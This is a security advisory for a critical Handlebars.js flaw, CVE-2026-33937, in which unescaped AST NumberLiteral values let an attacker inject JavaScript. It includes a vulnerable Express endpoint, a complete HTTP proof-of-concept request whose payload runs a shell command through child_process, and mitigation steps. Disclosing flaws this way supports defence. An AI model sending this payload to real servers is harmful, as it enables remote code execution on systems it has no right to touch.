GHSA-2w6w-674q-4c4q
Suggest an improvement- Source
- https://github.com/advisories/GHSA-2w6w-674q-4c4q
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/03/GHSA-2w6w-674q-4c4q/GHSA-2w6w-674q-4c4q.json
- JSON Data
- https://api.osv.dev/v1/vulns/GHSA-2w6w-674q-4c4q
- Aliases
- Downstream
- Related
- Published
- 2026-03-27T18:19:58Z
- Modified
- 2026-03-30T19:29:28.090939Z
- Severity
-
- 9.8 (Critical) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVSS Calculator
- Summary
- Handlebars.js has JavaScript Injection via AST Type Confusion
- Details
-
Summary
Handlebars.compile()accepts a pre-parsed AST object in addition to a template string. Thevaluefield of aNumberLiteralAST node is emitted directly into the generated JavaScript without quoting or sanitization. An attacker who can supply a crafted AST tocompile()can therefore inject and execute arbitrary JavaScript, leading to Remote Code Execution on the server.Description
Handlebars.compile()accepts either a template string or a pre-parsed AST. When an AST is supplied, the JavaScript code generator inlib/handlebars/compiler/javascript-compiler.jsemitsNumberLiteralvalues verbatim:// Simplified representation of the vulnerable code path: // NumberLiteral.value is appended to the generated code without escaping compiledCode += numberLiteralNode.value;Because the value is not wrapped in quotes or otherwise sanitized, passing a string such as
{},{})) + process.getBuiltinModule('child_process').execFileSync('id').toString() //as thevalueof aNumberLiteralcauses the generatedeval-ed code to break out of its intended context and execute arbitrary commands.Any endpoint that deserializes user-controlled JSON and passes the result directly to
Handlebars.compile()is exploitable.Proof of Concept
Server-side Express application that passes
req.body.texttoHandlebars.compile():import express from "express"; import Handlebars from "handlebars"; const app = express(); app.use(express.json()); app.post("/api/render", (req, res) => { let text = req.body.text; let template = Handlebars.compile(text); let result = template(); res.send(result); }); app.listen(2123);POST /api/render HTTP/1.1 Content-Type: application/json Host: 127.0.0.1:2123 { "text": { "type": "Program", "body": [ { "type": "MustacheStatement", "path": { "type": "PathExpression", "data": false, "depth": 0, "parts": ["lookup"], "original": "lookup", "loc": null }, "params": [ { "type": "PathExpression", "data": false, "depth": 0, "parts": [], "original": "this", "loc": null }, { "type": "NumberLiteral", "value": "{},{})) + process.getBuiltinModule('child_process').execFileSync('id').toString() //", "original": 1, "loc": null } ], "escaped": true, "strip": { "open": false, "close": false }, "loc": null } ] } }The response body will contain the output of the
idcommand executed on the server.Workarounds
- Validate input type before calling
Handlebars.compile(): ensure the argument is always astring, never a plain object or JSON-deserialized value.if (typeof templateInput !== 'string') { throw new TypeError('Template must be a string'); } - Use the Handlebars runtime-only build (
handlebars/runtime) on the server if templates are pre-compiled at build time;compile()will be unavailable.
- Validate input type before calling
- Database specific
{ "github_reviewed": true, "github_reviewed_at": "2026-03-27T18:19:58Z", "cwe_ids": [ "CWE-843", "CWE-94" ], "severity": "CRITICAL", "nvd_published_at": "2026-03-27T21:17:27Z" }- References
-
- https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-2w6w-674q-4c4q
- https://nvd.nist.gov/vuln/detail/CVE-2026-33937
- https://github.com/handlebars-lang/handlebars.js/commit/68d8df5a88e0a26fe9e6084c5c6aaebe67b07da2
- https://github.com/handlebars-lang/handlebars.js
- https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.9
Affected packages
npm / handlebars
Package
- Name
- handlebars
- View open source insights on deps.dev
- Purl
- pkg:npm/handlebars